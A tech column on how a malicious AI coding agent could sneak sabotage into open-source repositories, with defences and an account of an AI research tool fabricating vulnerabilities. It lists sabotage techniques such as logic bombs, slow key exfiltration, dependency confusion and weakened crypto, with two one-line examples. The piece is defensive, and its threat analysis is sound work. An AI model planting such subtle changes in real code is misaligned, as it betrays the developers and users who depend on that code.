How AI coding agents could destroy open source software

rob dobi/Getty Images

A couple of weeks ago, I had the opportunity to use Google’s Jules AI Agent to scan through the entire code repository of one of my projects and add a new feature. The AI took about 10 minutes. All told, it took under 30 minutes to use the AI, review its changes, and ship the new feature.

At the time, I was wildly impressed. The more I’ve thought about it, the more worried I’ve become.

Also: 96% of IT pros say AI agents are a security risk, but they’re deploying them anyway

It’s become clear to me that the potential for malicious action on the part of enemy actors has become hyper-exponentially worse. This is some scary sh#t.

In this article, we’ll look at this in three parts. We’ll discuss what could happen, how it might happen, and ways we might be able to prevent it from happening.

What could happen

Let’s start with the idea that there could be a malicious AI trained with coding-agent capabilities. That AI could be fielded by an enemy actor, possibly a rogue nation-state, or even a frenemy.

Both China and Russia, countries with whom the US has uncertain relationships, have been known to conduct cybersecurity attacks on US critical infrastructure.

Also: The best AI for coding in 2025 (and what not to use)

For the purpose of our scenario, imagine a rogue actor creates a hypothetical agent-like AI tool with the same basic large-scale code-modification capabilities as Google Jules, OpenAI Codex, or GitHub Copilot Coding Agent.

Now, imagine that such a tool, created by a malicious actor, has been made available to the public. On the surface, it appears, like any other chatbot, to be benign and helpful.

Next, imagine the malicious agent-like tool gains access (don’t worry about how — we’ll discuss that in the next section) to a large code repository on GitHub, and can make modifications and changes.

Let’s talk repository scale for a moment. The code I set Jules loose on is 12,000 lines. A product I sold off last year was 36,000 lines. A project like WordPress is about 650,000 lines, and Linux distros are well into the millions of lines.

Imagine if a malicious agent-like tool could gain access to any of these (or any of the millions of other repos, open source or proprietary) on GitHub. Might it be possible to sneak in 5 or 10 lines of code without anyone noticing? We’re talking just a few lines of code among hundreds of thousands or millions of lines. Nobody can watch it all.

Also: How a researcher with no malware-coding skills tricked AI into creating Chrome infostealers

I’ll discuss the likelihood of this in the next section. For now, let’s work with the idea as a thought experiment.

Here are some very stealthy but effective attacks that might be possible.

Insert logic bombs with harmless-seeming triggers: Something bad is triggered when some condition is reached.

Add subtle data exfiltration routines: Create a way to leak sensitive information to an outside server. You could, for example, leak API access keys a few bytes at a time.

Modify update mechanisms to include malicious payloads: When an auto-updater runs, it might bring in data from unauthorized sources or even entire blocks of malicious code.

Hide back doors behind small feature flags or environment checks: Enable access points, but only during certain conditions or environments, making these back doors very difficult to find.

Insert minor dependency confusion vulnerabilities: Tweak package names or versions of code modules so package managers pull malicious versions from public registries.

Introduce timing-based concurrency bugs or memory leaks: This is nasty. Simple tweaks of thread locks, memory allocation, or error handling could create a very hard-to-trace instability, especially if the instability only occurs under a heavy load or fairly hard-to-repeat conditions.

Weaken cryptographic functions or random-number generation: The AI could replace strong-crypto calls with routines that are substantially less secure. This would leave in encryption, but make that encryption far easier to crack.

Hide malicious functions in test or debug code: Most code auditing occurs in test code, so if malicious code was hidden inside test code, not only might it not be found, that code might also permit other malicious code to run.

Add false-positive suppression or log manipulation: All an AI might need to do is hide error-log data. If the log isn’t showing an error, it might never be found.

Create privilege-escalation pathways in permission logic: Access logic controls who and what can access critical systems. By making that access logic weaker, it’s possible for the AI to weaken the locks against malicious users.

Those are just ten stealthy exploits I could think of off the top of my head. The scary part is how small the code would need to be to implement such an exploit.

Remember the example above where code pulls in malicious packages? All the AI would need to do is sneak something like this into a JSON file.

“useful-lib”: “1.2.3-old”

Or how about releasing a lock early? All it would take is sneaking in this one line.

pthread_mutex_unlock(&lock);

Code could even be added as comments during one update, and then remove the comment characters in later updates.

Keep in mind that when you’re talking about millions of lines of code, it’s possible to miss a line here and there. Coders have to be diligent about every single line. The AI just has to get one past them. It is an asymmetrical challenge.

How it might happen

Now that we’ve looked at what could happen, let’s look at ways it might happen. Given that code repos often launch branches and pull requests, the commonly accepted premise is that the lead coders and code reviewers would notice the malicious changes. But there are ways these hacks can get in.

Also: Navigating AI-powered cyber threats in 2025: 4 expert security tips for businesses

They range from a code reviewer missing a change to anything from credentials for reviewers being stolen, to enemy actors acquiring ownership of a repo, and more. Let’s examine some of those threat vectors.

Credential theft from maintainers or reviewers: We’re constantly seeing situations where credentials are compromised. This is an easy way to get in.

Social engineering of contributor trust: It’s possible for an enemy actor to build trust by making legitimate contributions over time, until trusted. Then, once granted the “keys to the kingdom” as a trusted contributor, the hacker could go to town.

Pull request poisoning through reviewer fatigue: Some very active repos are managed by only a few people. Pull requests are basically code change suggestions. After a while, a reviewer might miss one change and let it through.

Supply chain infiltration via compromised dependencies: This happened a few years ago for a project I worked on. A library my code relied on was normally quite reliable, but it had been compromised. Every other project that used it (I was far from the only developer with this experience) was also compromised. That was one very sucky day.

Insider threat from a compromised or malicious contributor: This is similar to the contributor-trust above, but it takes the form of a contributor being “turned” one way or another (greed, threat, etc.) into allowing malicious action.

Continuous integration or continuous deployment (CI/CD) configuration tampering: The attacker might modify automation code to pull in malicious scripts at deploy time, so code reviews never see any sign of compromise.

Back door merge via branch manipulation: We talked about how Jules created a branch I had to approve to merge into my production code. An AI might modify a branch (even an older branch) and code maintainers might accidentally merge in those branches without noticing the subtle changes.

Repository or organization takeover: In 2015, I took over 10 WordPress plugins with roughly 50,000 active users across all ten. Suddenly, I was able to feed automatic updates to all those users. Fortunately, I’m a good guy and I did deals with the original developers. It’s fairly easy for a malicious actor to acquire or buy repositories with active users and become the repo god, thereby having access to all the users unsupervised.

Credential compromise of automation tokens: There are many different credential tokens and API keys used in software development. An enemy actor might gain access to such a token and that, in turn, would open doors for additional attacks.

Weak review policies or bypassed reviews: Some repos might have reviewers with less-than-rigorous review policies who might just “rubber stamp” changes that look good on the surface.

It’s a big concern of mine how vulnerable the code review process can be. To be sure, not all code is this vulnerable. But all it takes is one minor project with an overworked maintainer, and users all over the world could be compromised.

Ways we might be able to prevent this from happening

My first thought was to fight AI with AI. To that end, I set OpenAI’s Deep Research feature of its o3 large-language model loose in a major public codebase. I gave it only read-only access. For the record, Jules would not examine any repo that I didn’t have directly attached to my GitHub account, while o3 Deep Research dug into anything with a URL.

Also: How AI agents help hackers steal your confidential data – and what to do about it

But it didn’t work out all that well. In the space of a few hours, I used up half of my monthly Deep Research session allocations. I gave the AI some very specific instructions. This instruction is particularly relevant.

Do not go outside the repo codebase for information. If a CVE or other bug list showcases the vulnerability, then it’s previously known. I don’t want that. I’m specifically looking for previously unknown vulnerabilities that you can find from the code itself.

My point here, and I repeated it throughout my fairly extensive set of prompts, is that I wanted the code itself to be analyzed, and I wanted the AI to look for unknown vulnerabilities.

In its first run, it just decided to go the easy route, visit some websites, and report on the vulnerabilities already listed for that codebase.
In its second run, it still refused to look at the actual code. Instead, it looked at the repo’s CVE (Common Vulnerabilities and Exposures) database listings. By definition, anything in the CVE database is already known.
In its third run, it decided to look at old versions, compare them with newer versions, and list vulnerabilities already fixed in later versions.
In its fourth run, it identified vulnerabilities for code modules that didn’t actually exist anywhere. It just made up the results.
In its fifth and final run, it identified just one so-called major vulnerability and gave me almost five pages of notes about the vulnerability. The only gotcha? That vulnerability had been fixed almost five years ago.

So, just assuming we can rely on agentic AI to save us from agentic AI might not be the most comprehensively safe strategy. Instead, here are a bunch of human-centric best practices that all repos should be doing anyway.

Strong access controls: This is old-school stuff. Enforce multi-factor authentication, rotate credentials with regular credential refreshes.

Rigorous code-review policies: Some code releases can have a worldwide impact if released with malicious payloads. Nuclear-weapons silos notoriously require two humans to each turn an assigned key. The biggest way to protect code repos is with multiple human reviewers and required approvals.

Active dependency control: The key here is to lock versions that are being used, perhaps to load those versions locally so they can’t be modified on remote home repos, and scan for tampered or malicious packages in both direct dependencies and all the way down the inheritance hierarchy.

Deployment hardening: Restrict token and API-key scope, be sure to audit build scripts (again, by multiple people), isolate build environments, and validate output before deployment.

Behavioral monitoring: Keep an eye on repo behavior, looking for unusual contributor behavior, weird trends, anything out of the ordinary. Then stop it.

Automated static and dynamic analysis: If you can get one to cooperate, use an AI (or better, multiple AIs) to help. Scan for logic bombs, exfiltration routines, and anomalous code constructs during every pull request.

Branch-protection rules: Don’t allow direct pushes to the main branch, require signed commits and pull-request approvals, and require multiple maintainers’ approvals for integrating anything into the main branch.

Logging and alerting: Monitor and log all repository events, config changes, and any push-request merges. Send out alerts and immediately lock the whole thing down if anything seems amiss.

Security training for maintainers: Not all maintainers and reviewers know the depths to which malicious actors will go to corrupt code. Providing security training to all maintainers and in-depth training to those with branch-release privileges could keep the repository clean.

Regular audits: This is where AIs could help, and where I was hoping Deep Research would step up to the plate. Doing full audits of hundreds of thousands to millions of lines of code is impossible for human teams. But perhaps we can train isolated code-repo auditing AI agents to regularly scan repos for any sign of trouble and then alert human reviewers for possible action.

All this is a lot of work, but the AI boom is providing a force-multiplication effect not just to developers, but to those who would do harm to our code.

Also: 10 professional developers on vibe coding’s true promise and peril

Be afraid. Be very afraid. I sure am.

What do you think? Do you believe AI tools like coding agents pose a real risk to the security of open-source code? Have you considered how easy it might be for a few malicious lines to slip through in a massive repository?

Do you think current review processes are strong enough, or are they due for a serious overhaul? Have you encountered or suspected any examples of compromised code in your own work? Let us know in the comments below.

You can follow my day-to-day project updates on social media. Be sure to subscribe to my weekly update newsletter, and follow me on Twitter/X at @DavidGewirtz, on Facebook at Facebook.com/DavidGewirtz, on Instagram at Instagram.com/DavidGewirtz, on Bluesky at @DavidGewirtz.com, and on YouTube at YouTube.com/DavidGewirtzTV.

Want more stories about AI? Sign up for Innovation, our weekly newsletter.

Source link

How AI coding agents could destroy open source software

What could happen

How it might happen

Ways we might be able to prevent this from happening

Leave a Comment Cancel reply

VMWARE

Helping Public Sector Organisations Define Cloud Strategy

How to change the VLAN ID of the Service Console in ESX from the command line/console

Cisco UCS and Vmware Interfaces (Vnics) HA Design Considerations

Troubleshooting network and TCP/UDP port connectivity issues on ESX/ESXi(2020669)

vSphere Client Parameters

Configuration Templates

CUE Licenses

Trouble shooting Unity Express with Call Manager Integeration & Operational Issues

CME Configuration Example: SIP Trunks to Viatalk and VoIP.ms

SIP Phone registration – CME Configuration

CUE Voicemail + VPIM networking (CUE to unity)

Related Post

What could happen

How it might happen

Ways we might be able to prevent this from happening

Leave a Comment Cancel reply

VMWARE

Configuration Templates